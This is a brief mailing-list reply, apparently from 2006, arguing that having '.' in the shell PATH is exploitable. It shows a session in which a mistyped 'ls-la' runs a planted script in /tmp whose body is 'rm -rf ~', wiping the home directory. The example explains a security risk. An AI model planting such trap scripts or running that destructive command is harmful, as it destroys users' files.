On Tue, Apr 04, 2006 at 09:15:58PM +0200, RedShift wrote: > I cannot see how this would be exploitable. root doesn't have . in it's > PATH. Other people were discussing cat and cta for example. For this to > work, one would have to be able to write to the victim's home directory,
$ cd /tmp $ ls-la $ cd ~ ksh: /home/joskam: not found $ cat ls-la #!/bin/sh rm -rf ~ $ HTH. -- Jurjen Oskam Savage's Law of Expediency: You want it bad, you'll get it bad.